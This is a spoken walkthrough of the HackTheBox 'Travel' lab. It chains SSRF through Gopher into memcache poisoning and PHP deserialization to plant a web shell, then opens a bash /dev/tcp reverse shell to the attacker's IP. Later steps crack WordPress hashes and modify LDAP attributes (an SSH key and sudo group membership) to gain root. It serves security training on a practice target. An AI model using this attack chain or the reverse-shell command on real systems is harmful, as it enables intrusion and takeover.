What's going on YouTube? This is Ipsec, and we're doing travel from HackTheBox, which was an extremely tough box, but probably one of my favorite ones because the initial foothold was just really fun to do. Unfortunately, that initial foothold is going to be pretty hard to explain because it's a relatively long exploit path, and you have to look through a lot of PHP source code to figure out exactly how to trigger it. It's a server-side request forgery that you can use the Gopher protocol to access memcache, which is listening on the local host, to send a poisoned object. And that poisoned object is just a PHP serialized object. So you can create one that drops a file on the web server and then just call that to get code execution. The main tough part about this is just figuring out how the application, which is WordPress using a plugin called simplepie, actually uses that memcache thing to pull back pages. Hopefully it makes more sense once we go into the box, so let's just jump in. As always, I'm going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory, call it travel, and then the IP address, which is 10.10.10.189. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open, the first one being SSH on port 22, then we have HTTP on port 80, and then HTTPS on 443. Both HTTP and HTTPS are running Nginx version 1.17.6. However, the HTTPS has a few more nmap scripts that go off, one of which being the SSL-cert script, telling us the common name for this web server is www.travel.htb, and then it's also got a few alternative names, such as blog.travel.htb and blog-dev.travel.htb. So let's go and add these over to a host file. So I'm going to do sudo vi etc host, and then we'll just add 10.10.10.189, blog-dev.travel.htb, blog.travel.htb, www.travel.htb, and just plain old travel.htb. So we have quite a few websites that we'll want to enumerate. So I'm going to save the host file, and then we'll hop over in Firefox and check out each of those domains. So travel.htb, and we get a page. I'm going to try HTTPS as well and see what we get here. And accept the risk and continue. And it looks like HTTPS just has an error and says use non-SSL websites. If you wanted to look at the SSL script, you could just click on the little lock and go to view certificate. And wow, Firefox has definitely changed how they display this. What was alternative name? Dub. Here we go. Here's the alt names. But yep, it's weird how it's displayed, but you can see exactly what nmap pulled that way. So let's just go over to travel.htb, and we're going to take a look at the other ones. So there was a www, and I copied HTTP, so let's get rid of that. Blog.travel.htb and blog-dev.travel.htb. These two look like the same exact page. I'm going to press Ctrl-U to view the source to see if I can see exactly what this is. Template name. Don't see that much information here. We can try like /index.html. We get a page, index.php, not found. So I'm guessing travel.htb is some type of static site that is going to be announced soon. So I'm going to ignore that one. We do have blog. So I'm going to press Ctrl-U. And let's see, what do we have? I see wp-include and wp-content. So we know this is going to be a WordPress blog. I'm going to start a wpscan off in the background. And then we'll poke around a little bit. So wpscan-h. And that'll get us the help, so we can look at all the options. We will want to do --url. So wpscan --url http blog.travel.htb. Okay, so while that is running, we can take a look at the post. There is a travel blog post, but looks pretty empty. We can see the author is admin, so that's the user that made this post. And there's not really much else to do with WordPress. Looking at the results of wpscan, doesn't look like anything too interesting. So I'm going to go take a look at blog-dev and see what we have here. So we can do /robots.txt to see if that exists. We get a 404 not found. Interesting enough, / is just 403 forbidden, so it looks like it doesn't support listing files if it's just an open directory. So we can try to do a GoBuster, and I'm going to cheat a little bit. Normally I'd run the same one I always do, like directory list 23 medium, but it's actually missing the directory.git, and that's the directory we need. So maybe it's a good thing we change using that word list off default and switch to raft, which is out of the sec list. So I'm going to do GoBuster-u HTTP blog-dev.travel.htb -w for word list opt sec list, and then discovery web content. And then we got a bunch of ones here. I'm going to do raft large, and we'll do, I guess, files.txt and see what we get here. We have to do GoBuster in dir mode. And I guess we can also run the same exact thing, but we'll do it on the directories. So raft large directories. Oh, as I was going to do that, we have the hit of .git. So that is the directory we wanted to get. If we go into this, we can still see it's 403 forbidden, but if we access a directory that doesn't exist, we can see it's going to be a 404. So you could try going to, like, let's do it with curl. Curl get, one of the default files is always config, and you can see we can access the files if we know the name. There is a tool called git-dump, I think. Yep, git-dumper. There's probably a lot of these tools, but this is the tool we're going to be using. So I think I have it here, and I'm just going to install all the requirements. If you didn't have that, we can delete it and redo it. So we can do git clone, and then just paste that URL. So let's go in here. We can do pip3 install -r requirements.txt, and then we'll execute git-dumper. And what this does is, actually, does this have a proxy option? We can just proxy it. It does. Sweet. Let's try that. So let's do -u http blog-dev.travel.htb --proxy http localhost 8080, and then the output directory will do HTTP travel blog dev, and let's go over to burp suite. Proxy intercept is on. Let's see. Doesn't want -u for URL. And it looks like this is working. So I'm going to turn this off, and we're just going to look at the HTTP history of what this does. If you look here, you can see it fetched everything. But how does it figure out all the files? Well, let's just sort by new. We look at git head. It's going to point us to refs head master, which tells us we're on the master branch. And then head is going to be the commit we are on. So the code right after grabbing this is going to grab a bunch of default files. However, once we get over to like this, after all those, git log head. So here's the latest commit. There's the hash of the commit. Just looking for refs head master. Again, same exact hash as we saw in the log. But after it pulls this, this helps it identify where all the other objects are. We're getting a bunch of 404 not found, but if we look at the filter, it's hiding CSS, image, and binary content. So let's add everything in burp suite. And we can see it's now downloading a few things. And here are the actual files of the Git object. So if we go back into the directory we had put it in, so I can do cd alt period to cycle through the last argument. And these are the files out of that Git. I'm going to do git log, and we can see it's just the one, so there's no other commits here. Let's take a look over at the README. We can see the setup is git clone, copy RSS template.php and template.php to wp content themes 2020, and then create a logs directory, and then create the page in the backend and choose RSS template as theme. They've disabled cache, additional security checks, and they need to finish the logging implementation. So not really sure what we have here, except the only thing we can be positive about is the directory this is in. So let's go test that out real quick. So if we go to blog.dev.travel, we can try this. And it's probably going to be, what's the file name? If we look at it, RSS_template.php, not found. We probably got not found here, not 403. So let's try going back to the blog. So getting out of dev and going here. Looks like that may be a directory /log, path not found, logs with a S, and forbidden. So we know exactly where we are. We can probably find template.php if we wanted. So let's take a look at the source code to see if it shows us anything. So I'm going to do grep, and it's all PHP. So I'm going to search for system, exec, shell, select, and serial. Just some key things I want to search for first, and the only hit we get is shell and exec, and that is in template.php. And just looking at this, we have shell exec PL, so this looks very good for us. So let's do vim on template.php, go to shell exec, and see what we have. So this function URL get contents, it's going to call safe on URL, and safe is looking like it's preventing us from using file or at, and it's saying hacking tech prevented LFI. And it also doesn't want us to use localhost. So localhost or 127.0.0.1. So let's see. I'm in V already. So I'm just going to put a comment. I guess prevent SSRF attacks on localhost. And then let's see, escape shell args. So this is going to prevent us from just like putting semicolon command. That's doing curl on URL and then shell exec return output. So the main thing we want to do first is make sure we can get this function probably to call us, because the dangerous function looks like it's shell exec. So let's see if we can get it to make a request to us. So I'm going to do grep URL, what was the name? URL get contents. So grep URL underscore get, and that's in RSS template. So URL underscore get contents. Let's see. So template name awesome RSS, include template.php. So let's go to blog.travel.htb, awesome RSS. And then what argument do we give it? Is there any get? So if is set get debug, include debug.php. Let's see. Let's grep underscore get, and we'll do a -i to make this case insensitive. And we can only include debug. So I'm going to try $debug. I guess we just do debug equals anything. So test. And I'm going to search this for debug. And we can see something here. A PHP serialized object and XCT something. So not exactly sure what this is doing, but if we do this without debug, we no longer see debug output. So if I do now question mark debug, probably don't even need anything. I can probably just do that. It's going to put this. We should be able to also just call the debug.php ourselves. So we can probably do, what is it, WP content, themes 2020, and then maybe debug.php. And we can. So I'm going to send this over to Burp Suite. I'm just going to make note of it. So proxy, intercept, turn it on, refresh, send it to repeater. I'm going to double click one and put debug. And that just gives us that pretty. So the next thing we want to do is figure out how to make the web server get curl back to us, because if it can, maybe we can change what this is outputting, or this object. So let's go back here and let's see. Get feed URL. Instead of get, I'm just going to do $_. Maybe there was a post or a request. And while I don't see those, I do see server. So let's go open up this code and take a look at server. So going here, search for server, and we can see URL is equal to that. And then we're checking if URL contains custom feed URL. And if it does, let's see. It's going to set that variable, else the variable is equal to custom feed.xml. So let's cat this so I can easily copy from it. Grep custom-b2. And I'm just going to grab this. Actually, I just want this path. I'm going to grab and just look at where this is. Let's see, 404 not found. Maybe it's here. See, I'm not sure exactly where this newsfeed is. Oh, www.travel.htb. So we can www. And we get the newsfeed. Okay. So newsfeed. And I could just do www here. I didn't have to edit this because blog.travel.htb and www is actually going to the same host. But if you wanted to go to a different web server altogether, you have to make sure to configure the target details up to the top right. So that's the newsfeed. Let's go create a new thing, and we're going to try, what is it? Awesome-RSS. Is that a page? It is. So it was custom URL, custom_feed URL. And then equals HTTP 10.10.14, my IP is .3, / please subscribe. Okay. So I'm going to make dir www. And I'm going to touch, please subscribe. Actually, let's echo thank you to that file. Okay. And python-m http.server. If we do it with sudo, we can listen on port 80. Python 3. There we go. Send the GET request. We get the page and go here. I don't see anything. I'm going to rename this debug. This will be SSRF. So we don't see any options here. If we just grabbed this with awesome RSS, I think, is that what we did before? So if we just grab this and then hit debug, we actually get something. But if we do it with our server-side request forgery and hit debug, this may just have to wait a little bit to go away. But yeah, so that's weird. So let's go take a look at the code and see exactly what that is doing. So let's go back to blog-dev and then vi RSS template. And let's see. If URL, simplepie, set cache location, it's doing memcache to localhost, and prefix xct underscore. And we're looking here. Here's the prefix xct underscore, and then it's got some characters. Set feed URL init, and then error die out. So let's see. I'm going to try something real quick. Let's go back to Burp Suite, go to newsfeed, copy curl command, and let's go into www curl -o please subscribe. So if we cat please subscribe, did not do it. To please subscribe. So if we can now cat please subscribe, we have the file. I'm just going to get rid of the header. So now please subscribe and newsfeed should be the same exact file. So let's do sudo python 3 -m http server port 80. Let's hit debug. There's nothing there. Let's do our server-side request forgery to pull please subscribe, and then hit debug. Nothing is there still. I'm going to move please subscribe to please subscribe.xml. We'll try it again. So please subscribe.xml hits it, and we get this. So the main difference, I'm not sure if you noticed, but this 8E45 changed. If we just get it on, I think it's this one. Yeah, awesome RSS. It becomes 4E5. If we get it with our server-side request forgery, it becomes 8E something. We can also, let's try moving please subscribe to thanks.xml. And we will grab that. So go to debug, and we have yet a third one, bed b something. So based upon knowing it's memcache, and memcache is essentially a caching engine for just dynamic content. So if the server ran the query before, it throws it into memcache, so it can just pull it from memcache instead of running the query again to speed up the server. So if we look at this, we got memcache right here. So what I'm guessing is this is some page identifier to identify what page you are on or what the feed is. So let's Google to see exactly what simplepie is. So PHP simplepie, and then let's just turn intercept off. And it's a super fast, easy to use RSS and Atom feed. So we're probably caching simplepie objects inside of memcache. And that is going to be probably the feed. So this ... is saying there's more data. I'm guessing this whole PHP object is going to be the entire XML feed, if I had to make a guess. And we can see after a while the things go away. So the main thing we want to look at right now is this simplepie application and see if there's a vulnerability in simplepie itself. So let's go over to, actually I think we are where we want. So class-simplepie.php is what I want to search for. So let's look at this file. So simplepie.php. See, this looks like it's going to be kind of a man page. WordPress. I'm just going to put GitHub on my search. Or I don't have to because I see GitHub right there. So now we got the simplepie class. So we are doing probably set feed URL we want to look at. So what's set feed URL? Please use set feed. Here we go. And this doesn't look like it's what we want. So let's go to the very top of this. And actually, let's see if I can pull this down real quick and then we can open up like Visual Studio Code. So let's do git clone, WordPress. And it looks like it's going relatively fast. I'm going to do, I think, Alt F2, VS Codium. Let's open this up. File, open folder. Let's get away from Fatty. Go to travel, blog dev, WordPress. Okay. So it was, where were we? We're in WP includes. So WP includes. Class simple. So class dash, where's simple? Simplepie. This is where we are. Download update later. So it's pulling a bunch of other files. So I'm going to go into the probably simplepie directory and see what we have. So let's go simplepie, cache, and I'm going to do memcache.php because that's what we're using is memcache. So scrolling down here, this is us creating the object. And we can see it's doing MD5, name, and type. So this is probably going to be the key. So if we look into repeater, it's probably going to be this. And before the prefix, so this is probably XCT, and this is this. It's probably MD5 sum, but it's being truncated. So this is probably where we want to be. We can scroll down and we can also verify that the simplepie plugin is just going to unserialize data. And I'm guessing that's going to be this. So there's going to be a few things we have to do. We have to figure out exactly how this page is created because these objects will only be triggered on the page they are. We suspect that it's related to this where is it? MD5 type thing. So we have to figure out what type is. And then once we're here, we can put a PHP object to be deserialized and try to get code execution on the server. So we'll worry about this object later. Let's try to figure out how to name our PHP objects. So let's see. Name type. Let's go to the class again. Let's see, open editors. I don't have it open. So class dash simplepie. Let's see, do I have it open? I don't know why it's not keeping it open, but okay. So this is where we are. Let's do, I'm just looking for the URL feed. And I think this is the function where it's going to do that. And we can see the URL is right here, and SPC is going to be the type. So let's go and do echo, and the URL we were getting is this. So let's do echo this colon SPC MD5 sum. And it should be equal to, where is it? That. So we just get on awesome RSS or awesome-RSS. Gen cookie, I guess. Gen cache. So we needed to equal 4e something, and we're at 7.3. So that's not it. Let's try http www.travel.htb, and that's not it either. So let's go back in the code, and we have to figure out exactly what the URL is. So it's calling get handler, and can we find or edit, find in files, get handler, right here, explode that. That doesn't look like it's going to be too helpful. See this cache location. We can look at cache name function. And we see cache name function is MD5. So my assumption right now is it's going to do an MD5 sum on the URL. Then that MD5 sum is going to be placed here. It's going to be MD5 colon SPC, and it's going to do another MD5 sum. And we probably should always do echo-n when we do this. So let's do this MD5 sum, and then we can get rid of this and do it here as well. And it looks like that's actually generating our MD5. So we have 4E516, 4E5 or 61, 4E561. Yep. So we have the hash. So I'm going to make dir exploit cd exploit the notes page hash. Okay. So the next thing we have to do is be able to put a poisoned cookie on. So we have to be able to edit this. If we go back to our server-side request forgery, or let's go back to RSS template. We have to be able to hit this port, this 11211 port. And if we can hit this port, we can put the cookies in. However, the thing that's stopping us from hitting that port is this safe function in template.php, because it's preventing us from doing file, and it's also preventing us from doing localhost. If you go, I think it's the holiday video, we talk about different ways of encoding IP addresses. One of those ways is hexadecimal. You can also do decimal. There's a bunch of ways to encode it, but this is just one way to view an IP. So if we ping 127.0.0.1, we get that. However, we can convert this to hex. So 127 in hex is 7F. This is 00, this is 00, and this is 01. So we can also ping 0x7f like that, and it translates to localhost. So we can put this in for the URL. So we can do like that, and it'll access it. So let's go and do it for 10.10.10.14.3. So that will be A, which is 10. So 10.10, that's two A's. Then E is 14, I think. And then 3 will just be 03. So we did that conversion right. So let's just verify that this works. So let's get out of that. Where's my dub? We can just go here. Sudo python 3-m HTTP server port 80. And we're replacing it with AAE3. And we can see the server gets it. So now we have a way to bypass the localhost exclusion. So this should be going to localhost. Let's just ping it real quick to be sure. It is. So we can also put 11211. So now there's a bunch of other protocols we can use. So file is blacklisted, so we can't use that. And the @ sign is also blacklisted, so we probably can't do FTP because you always do FTP username at the address. So we can't use that. We could probably use Gopher, which is a super old protocol. So if you Google like Orange Sci protocol smuggle, I think this is it. Yeah, this is a really good presentation, which we're going to be doing. So was going to encapsulate pretty much an HTTP packet inside of Gopher, which is just, yeah, he'll explain it in this presentation. I recommend watching it. So let's go back to our thing and see what happens when we send this. So hit send, we're waiting, and we don't really get anything back. And that's because we're not using this protocol correctly. So what we want to do is just search for the tool gopherus, I think, GitHub. And this generates Gopher links with potential exploits. So let's go and grab this and we'll test it out. So cd/opt, git clone, that tool, go into it, run it. We can do -- exploit php memcache. And let's just put the payload as please subscribe. So it gives us this payload. So let's just copy this, go back to burp, and then paste it after this. And then click send. And it's not getting a response back. Let's see. Custom feed URL. Oh, we have to do 0x. Cancel. 0x. Hit send. And then go to debug. And we can see we have now poisoned memcache. So we can actually put anything we want here. So let's try something real quick. So let's go and where is it? By blog-dev exploit, cat notes. Let's put xct_this. Let's go in this payload, ssrf, and actually before we do that, let's show you exactly what this is. So I'm going to do smart decode, and we can get rid of that. And we can see it's putting a line break, and then set Spider 4015, please subscribe. 15 is going to be the, I think, buffer. 4 is flags. I forget what the other thing is. But if you just Google like set memcache, and it'll show you the syntax. Let's see. Key, variable to store, flag. Let's see. Set data maybe? There we go. This is better. So key, the flags, this is going to be that expiration time and bytes. So expiration time, 0 means no delay. So if we put this to like 999, it's probably going to last a lot longer than at 0. And 15 is the length. Please subscribe is 15 characters long. So what we're going to do is go back into repeater, and we're going to change spider to xct underscore and our hash. And before we do that, I'm going to get awesome RSS. And this is 2,700 bytes. Let's see what happens if we send this and get it again. So we sent that. We look at this, XCT, and then here, 2,700 bytes. I'm guessing it's probably because something failed and repulled it. Yeah, so I'm not sure exactly why that didn't work. We'd have to look at logging on the PHP server. But I'm guessing when this awesome RSS went to pull the page, it noticed, oh, the page isn't valid XML, so it just decided not to display anything. So now that we have that, we have to figure out how to put a payload here where please subscribe is. And if we go back into the template, there's a logging class that we can use as a deserialization payload. So what I'm going to do is copy this. And if you don't understand PHP deserialization, I created 2 videos that explain it pretty well. So you can just go to ipsec.rocks and do PHP deserialization. There's an advanced one and there's an intro. So let's grab this, the pwn.php, paste, and these 2 privates we're going to turn to public. Okay, we don't need a wake up call. And we'll also want to do PHP like that. So now we just have to do the exploit. So payload is equal to new template helper. And we'll call this please subscribe.php. And that's going to be file. So string file right here. And the next thing is the contents of that file. So I'm going to do PHP system and then request please subscribe. Okay. And we also need to escape that. And I think that should be fine. Let's see, I'm just taking a look at that. Looks good. I can put a semicolon here just in case. And then we want to echo serialize payload. So this should give us the payload. So PHP pwn.php. If we create logs, we can look at what it created. PHP system. That looks good. So I'm going to run pwn again. We're going to copy this object. And then we're going to run it in gopherus with exploit memcache. Paste this. And it says we should all be set. So let's try this. And we'll have to rename spider because we have to put the page. So let's go back to ssrf. And I'm actually going to Copy that. Copy this. Paste. Copy that down and replace the name. So now we send this, we go to debug, and nothing happens. So we screwed something up. Oh, I don't have a space here. So I knew I screwed something up because nothing was going into the response. The request didn't end with space HTTP. So if you ever see burp doing that, you probably did like Control N to highlight everything and deleted that HTTP piece. So do that, go to debug, we have this. And then if I hit this page, it's 17426, which I think is much smaller. I thought it was 2 something. But let's try going and grabbing the file. So we called it what? Please subscribe.php. 404 not found. So, oh, it's in logs. 200, okay. So that's definitely what we want. So now we can just put please sub, what do I call it? Yeah, please subscribe. It's equal to who am I? Oh, we have to change this over to a post request. And we get dub data. So now let's do a reverse shell. So bash-i dev tcp 10.10.14.3 9001 0 and 1. Then we'll URL encode it. And then we can exit nc lvnp 9001. Let's do script shell.log, and I am in blog dev. So let's just go here, make dir logs script shell.log nc lvnp 9001. Send the reverse shell, and we didn't get a hit. I base 64 encoded this. How did I do that? Still didn't get a hit. So what I'm going to do, Control-Shift-U to URL encode it, bash-c, and put the command in here. Now Control-U. We don't have a response back because we have a shell. So I'm going to do python-m, or python-c, import pty, pty.spawn, bin bash, python3-c, import pty, pty.spawn, bin bash, which python 3. We don't have Python at all. Let's see. I think I do script-q. And then let's try stty raw minus echo fg. Looks like we are good. So let's cat please subscribe. Ooh, tab does not work. Control C does, but tab does not. Let's do bash. Cat please. There we go. So that now works. Let's test standard error. And it looks like everything works. So we just had to type bash after that. Our shell size is off. So I'm going to do, is it TTY or STTY? -A. And we can do STTY-A, rows 16, columns 136. Modes may not be set. Oh, I don't do -A, I just do STTY, rows like that. So rows 16, columns 136. So now when I go all the way over, it doesn't truncate like it was before. the last thing I want to do is be able to clear the screen. So I'm going to do export term is equal to xterm. I thought that would have done it. I don't think we do it like this, do we? Clear. Oh, export term in all caps is equal to xterm. There we go. So now we have our reverse shell set up. So let's go to cd/, do an ls, and we see we're in Docker environment. If I do an IP ADDR, I can see my IP address is 172.30.0.10. So let's see, let's go to home. I'm guessing there's no home directory. Nope, nothing there. So normally when I'm in a Docker, I think of what type of Docker I'm in and then try to pillage data, because going over the root of a Docker isn't really going to do that much. So our concern isn't really escalating the root. It is getting information to do lateral movement. And since we're in the blog Docker, I'm guessing we have to go into like the WordPress database. So I'm going to go var www HTML, and we can look at the wp-config.php, and we want to go for the username and password. So database user is WP, and the password is this. So MySQL-u WP, hit -p, paste in the password, and we can do show databases, use WP, show tables, and then we can do select, or instead of select star, let's do describe WP users. And we can do select user login, user pass from WP_users, and we get a username of admin, and here's the password hash. So let's go over to the Kraken and we'll try cracking it. So cd hashcat v hashes / we'll call this actually travel, paste it, and then we're going to do /hashcat grep, or before grep -- example hashes grep, and we'll do like that, I think. And we can do -b4 to do before 4, and it looks like that hash may be a PHP pass, so mode 400. I'm just going to cat hashes travel real quick, and it definitely looks like it is mode 400. So /hashcat -m 400 hashes travel opt word list rocku.txt, and hashcat is starting. So while that cracks, we can take a look at other things. So we got 0 out of 1 recovered. We could do rule files, but generally in HackTheBox, you're not going to have to spend too much time trying to crack something. And rules just makes your dictionary bigger by doing a bunch of permutations to it. So if we go into /opt, which is another common directory of putting files, there is a WordPress file. If we look at WordPress, you have a backup.sql. So if we cat this file, there's a ton of text, but right at the very bottom, we see insert into WP users. We got admin, admin at travel, link-admin. So we got a few more. So let's go and cancel this crack, v hashes /travel. And we're going to put all of these. So let's grab this. Paste. We'll do admin : this is admin at travel.htb. Oh, I think this hash is that. Admin at travel.htb. Okay. Then the next one is going to be link-admin. paste, delete this. So it looks like there's only 2 hashes. So we'll do that and do the same exact command, except I'm going to do --users because I included usernames in the hash file. Or is it --user? No S. And what that's going to do is it's going to just take the hash file and grab everything after the first colon and use that for the password. The main benefit is your hash file stays organized with the username. So when we do a --show, so we can get rid of the word list, --show to show cracked, it remembers that username. If we went into hashes travel and got rid of that colon, and we just had hashes in this file, then when we do --show, it's not going to show us the user. So it kind of just helps us stay a bit more organized. So lynik-admin has the password of 1 step closer. So what I'm going to do is we're going to try SSH and then into 10.10.10.189, which is travel. Yes, and permission denied. So let's try lyn, where is it? ik-admin at that IP, and it allows us to do a password. So I'm going to paste the password, and we get into the box. So if we do ls-la, there's a few files that normally aren't here. We got a ldaprc file. So if I cat that file, we see LDAP information. And then we also have a viminfo file. So looking at viminfo, doesn't look like there's that much interesting thing, except potentially bind PW, the road less traveled. And in LDAP, passwords are called like a bind password. So this is most likely going to be the password. We could just do now LDAP search -x for basic authentication, -w, and then the bind password, and we get a big LDAP dump. And it's using this .ldaprc file and putting the base and bind DN for us. So I think it would be like, I think -b, DC equals travel, DC equals HTB. Did I do this one right? And then -d would be bind DN if you want to do this locally. But we don't really have to do that. We can look at all this information in LDAP search and potentially reset a password. So lynik-admin, oh, we already knew his password. That's the account we logged in at. And nothing else really. So we can do sudo-l since we are an admin, and it was 1 step closer as the password, and we may not run sudo on Traveler. But one thing I really like doing with LDAP is just opening up in some type of GUI. We could use LDAP modify and modify a bunch of things that way, but it's just not an intuitive thing to do through a command line. So I'm going to Google Apache Directory Services, I think. Yep, this thing. And I actually think it is this one, the Directory Studio. Let's try this. Click it, download for Linux, then sure, save file, and this could take a little while to download. It's 100 megs, and my download isn't going too fast, so I'm going to fast forward the video and we'll resume once this is done downloading. So it's now just finished downloading, so let's unzip it and execute it. So let's go MV downloads Apache Directory Studio tar zxvf to decompress it, and then let's go into the directory and execute Apache Directory Studio. So before we can actually access LDAP, we're going to have to do a port forward because LDAP wasn't actually listening on the routable interface. If we go back to our nmap and look at it, so cd./nmap less travel.nmap, we only have 2280 and 443 open. LDAP is on port 389, which is only listening on localhost. If we go back to this, netstat-rn, maybe sslnpt, we can see, it's not there. And that's probably because it's etc hosts, and it's 172.20.0.10. Are we? Yeah, we're on the root host. Okay. Yep. I was wondering if we were in another Docker container, but no, it looks like we're on the root host because I didn't see that Docker N file, and I also have a bunch of interfaces. So we have to forward port 389 to the host. So cat.ldaprc. So what I'm going to do is, if the very first command you enter in SSH is squiggly C, it's going to drop you to a hidden prompt. So I'm going to do enter squiggly C, and then we can do -L. And I didn't run SSH with sudo, so I can't open port 389 locally on my box because it's below 1024. Any port below 1024 requires root to open that socket. So I'm just going to do port 9389. And anything on my box from port 9389, I'm going to redirect it to LDAP.travel.htb on port 389. So now we can probably get out of this shell. Now I can do a LDAP search -x -h localhost 9389, and then we need -b for the base DN. This is going to be DC equals travel, then DC equals HTB, and -d, this is going to be who I'm binding as. We'll do cn equals lynik. I'll just copy and paste this. Like that. And we'll probably need -w and put a password. So cat.viminfo, and we'll grab the road less traveled. So now I can run LDAP from my Kali box or my parrot box. So we can do file new, LDAP new connection. Connection name is going to be travel localhost 9389. Now we're not going to do any encryption. Bind user. Let's grab this. And bind password. Let's grab this. And we can check authentication. Authentication was successful. So we can do finish. And we should be able to view LDAP. So I'm going to click this little tree icon. And then we'll make this window bigger. And we can go DC equals this. And we can browse LDAP. And you'll notice this is very much like the Active Directory Users and Computers MMC console, because that's essentially the same thing. So we have our CN lynik-admin, and we have user password and everything. We also have this user OU. So let's see if we can modify anything here. Let's see. I'm going to play with the Lynik account. So let's change the name to be ipsec. And it looks like we did. And you can see the command it ran here. It specifies the full DN. Change type is modify, replace CN with the CN of ipsec. So if we were doing it through command line, this is what we'd have to do. So let's see if we can give it a password, because we have a user password variable here. So I'm going to right click, new attribute. We can do user password. Click next. I guess we can just do finish. And that wants us to put a password. So we'll do please subscribe. If I can type. There we go. Click OK. So we have now modified the password. Man, that color is horrible. But now let's try suing to Lynik. So su-lynik, please subscribe. And we get permission denied. So let's try SSHing. SSH Lynik at 10.10.10.189. And we just get permission denied right away. So let's take a look at that SSH config if we can. So etc sshd, maybe just ssh, then cat sshd underscore config. And we see enable password access for admins in case certificate fails. And we allow travel admin and lynik-admin access. So nothing there. .d, nothing in that. So we have to use SSH keys. And if we Google around LDAP Linux SSH key, it does allow you to use it. The easiest way to do it would just be right click, new attribute, and let's do SSH public key. Public key for this schema is not allowed. Okay, so we have to create the object class LDAP password because we don't have it here. So new attribute, object class, and then let's add LDAP public key. It was LDAP public key, not LDAP password. So add that. So now we have this object class in our user, which is going to enable us to do SSH public key and edit as text. Let's generate a key. So let's go here, SSH keygen -f lynik cat lynik.pub. We can copy the SSH key, paste it in, click OK, and now we sent it. So now we can do SSH lynik at 10.10.10.189, and we specify the key. So -f Lynik like that. Is it -i? I think it's -i for key. Yep, there we go. So now we're in the box. We can do sudo -l, please subscribe is the password we set for this user, and it says he may not run sudo on this box. If we look at the groups, we're a member of domain users, and we cat etc group grep domain user. Is it groups? grep-i. Oh, because it's in LDAP. It's not in passwd. It's group 5000. So we could change this group to be something else. So if we look at group, we can do sudo, or we can do root. Let's try root real quick. Let's try setting this to gid equals 0. Okay. So we run groups, we're domain user. Let's exit out, go back in. Groups, still domain user. cd root, permission denied. So maybe there's something that prevents us from doing that group. Let's cat etc group grep sudo 27. Let's add ourselves to 27. exit, go back in, groups. Now a member of sudo and domain users. So there's probably something on the box that prevented us from taking the root group. But being a member of sudo, we can do all, so we can do sudo su dash, and now we have rooted the box. So that is it. Hope you guys enjoyed it. Take care, and I will see you all next week.